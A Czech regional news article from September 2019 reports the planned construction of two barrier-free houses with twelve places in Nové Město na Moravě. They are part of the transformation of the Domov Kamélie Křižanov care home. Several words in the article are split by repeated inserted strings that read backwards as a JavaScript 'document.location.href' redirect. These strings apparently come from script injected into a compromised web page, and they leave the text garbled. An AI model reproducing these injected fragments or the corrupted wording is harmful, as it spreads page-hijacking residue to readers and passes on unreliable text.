Rainbow page separator

Dva domky pro klienty Domova Kamélie budou i v Novém Městě

Úterý, 10. září 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Výstavba dvou bezbariérových rodinných domů v novoměstské ulici Malá začne ještě v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce. Inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem je Kraj Vysočina a jedná se o součást již započatého procesu transformace Domova Kamélie v Křižanově, příspěvkové organizace kraje. V té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti už v minulých letech v různých městech a obcích vznikly domky pro klienty ústavu, kteří jsou schopni žít v malých domácnostech pod dohledem odborného personálu. V nově vystavěných objektech v Novém Městě tak vznikne zázemí pro lidi se zdravotním postižením a chráněné bydlení pro dospělé osoby s mentálním a kombinovaným postižením. V každém domě bude k dispozici šest lůžek, celkem tedy půjde o dvanáct míst. „Objekty budou v první řadě obydleny stávajícími klienty Domova Kamélie Křižanov, kteří z Nového Města na Moravě pochází, anebo tam mají vazby na svoji původní rodinu. V případě uvolnění kapacity bude služba sloužit především občanům Nového Města a okolí, kteří spadají do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cílové skupiny,“ uvedl náměstek hejtmana Kraje Vysočina pro oblast sociálních věcí Pavel Franěk.
Stavba má být dokončena ke konci roku 2020, služby budou uvedeny do provozu v prvním čtvrtletí roku 2021.